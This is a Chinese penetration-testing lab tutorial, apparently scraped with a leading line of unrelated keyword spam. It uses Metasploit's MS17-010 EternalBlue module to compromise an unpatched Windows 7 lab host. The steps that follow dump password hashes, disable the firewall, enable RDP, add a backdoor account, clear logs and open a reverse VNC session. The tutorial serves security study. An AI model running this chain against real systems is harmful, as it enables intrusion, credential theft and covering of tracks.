专业做二手网站有哪些,深圳小程序定制公司,手机网站底部导航代码,手机软件开发语言kail利用msf工具对ms17-010#xff08;永恒之蓝#xff09;漏洞入侵渗透Win7
前言#xff1a;
提到操作系统漏洞#xff0c;大家肯定听说过耳熟能详的永恒之蓝#xff08;MS17-010#xff09;了#xff0c;他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用…kail利用msf工具对ms17-010永恒之蓝漏洞入侵渗透Win7
前言
提到操作系统漏洞大家肯定听说过耳熟能详的永恒之蓝MS17-010了他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSANational Security Agency美国国家安全局泄露的危险漏洞“EternalBlue”永恒之蓝进行传播 。勒索病毒肆虐俨然是一场全球性互联网灾难给广大电脑用户造成了巨大损失。最新统计数据显示100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
实验环境
工具metasploit
靶机两台windows 7sp1和kali2020
攻击机IP地址192.168.29.131
被攻击机IP地址192.168.29.128
实验条件两台机子可以互通的并且windows 7sp1无补丁开启了445端口防火墙是关闭的。
步骤
1、在kali里面打开metasploit漏洞利用框架 2、搜索ms17-010漏洞利用模块 search 17-010 找到exploit/windows/smb/ms17_010_eternalblue
其中exploit具有攻击性auxliary是用来验证的。
3、使用利用模块useexploit/windows/smb/ms17_010_eternalblue 4、查看配置项 show options 5、设置 靶机IP地址RHOST攻击机IP地址LHOST 再次查看配置项 6、实施攻击exploit/run 7、攻入目标主机 Meterpreter 是 Metasploit 的一个扩展模块可以调用 Metasploit 的一些功能 对目标系统进行更深入的渗透如获取屏幕、上传/下载文件、创建持久后门等。 在攻击进去的情况下演示几个功能
1、查看目标主机的操作系统信息sysinfo 2、对目标主机的屏幕进行截图截图保存在/root下 3、查看目标主机所有的用户名和密码密码显示为hash值 4、获取shell页面 乱码解决方法
输入chcp 65001可将乱码解决 5、关闭防火墙 6、关闭Telnet服务 7、用两种方法开启远程桌面服务并查看远程桌面功能启用情况
1方法1run getgui -e 2方法2run post/windows/manage/enable_rdp 到windows7sp1上查看远程桌面功能启用情况 8、创建系统用户创建用户名为test密码为123456 9、清除日志 使用VNC payload远程操控目标电脑
1输入Background返回退出meterpreter界面 2查看set payload 参数输入set payload 按两下 TAB键 找到windows/x64/vncinject/reverse_tcp复制黏贴 3set payload windows/x64/vncinject/reverse_tcp 4set viewonly no 5exploit 成功获取控制权